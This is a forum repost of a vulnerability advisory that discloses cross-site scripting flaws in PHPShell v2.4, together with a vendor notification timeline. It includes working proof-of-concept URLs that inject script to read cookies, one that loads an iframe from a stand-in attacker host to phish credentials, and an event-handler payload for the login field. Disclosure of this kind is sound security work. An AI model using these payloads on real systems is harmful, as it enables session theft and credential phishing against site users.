geeko Posted February 22, 2017 Report Posted February 22, 2017 [+] Credits: John Page AKA hyp3rlinx [+] Website: hyp3rlinx.altervista.org [+] Source: http://hyp3rlinx.altervista.org/advisories/PHPSHELL-v2.4-CROSS-SITE-SCRIPTING.txt [+] ISR: ApparitionSec Vendor: ========== sourceforge.net/projects/phpshell/ phpshell.sourceforge.net/ Product: ============= PHPShell v2.4 Vulnerability Type: ==================== Cross Site Scripting CVE Reference: ============== N/A Security Issue: ================ Multiple cross site scripting entry points exist in PHPShell undermining the integrity between users browser and server. Allowing remote attackers to bypass access controls such as the same-origin policy. If an authenticated user clicks an attacker supplied link. XSS issue is made possible because PHPShell calls print $_SERVER['PHP_SELF'] on the main HTML form. Since PHP_SELF references URL, PHPShell simply reads our XSS payload in the URL and echoes it back to client. <form name="shell" enctype="multipart/form-data" action="<?php print($_SERVER['PHP_SELF']) ?>" method="post"> Since PHPShell purpose is to execute system commands this XSS vulnerability can potentially become a 'Remote Command Execution' vulnerability. Moreover, this XSS issue can also potentially leverage a Session Fixation vulnerability also present in PHPShell. Reference: " http://hyp3rlinx.altervista.org/advisories/PHPSHELL-v2.4-SESSION-FIXATION.txt " Tested successfully in Firefox Exploit/POC: ============= XSS 1) http://VICTIM-IP/phpshell-2.4/phpshell.php/%22/%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E OR Inject IFRAME to phish and steal credentials, you get the idea. http://VICTIM-IP/phpshell-2.4/phpshell.php/%22/%3E%3Cscript%3Evar%20frm=document.createElement('IFRAME');document.body.appendChild(frm);frm.setAttribute(%22width%22,%22900%22);frm.setAttribute(%22height%22,%22900%22);frm.src=%22http://ATTACKER-IP.com%22%3C/script%3E%3C!-- XSS 2) http://VICTIM-IP/phpshell-2.4/phpshell.php On the Login Authentication HTML form 'username' input field " onMousemove="alert(document.cookie) enter a password and hit Enter. Network Access: =============== Remote Severity: ========= Medium Disclosure Timeline: =============================== Vendor Notification: No reply In addition the INSTALL file "Bugs? Comments?" Tracker System link is HTTP 404 http://sourceforge.net/tracker/?group_id=156638 February 18, 2017 : Public Disclosure Quote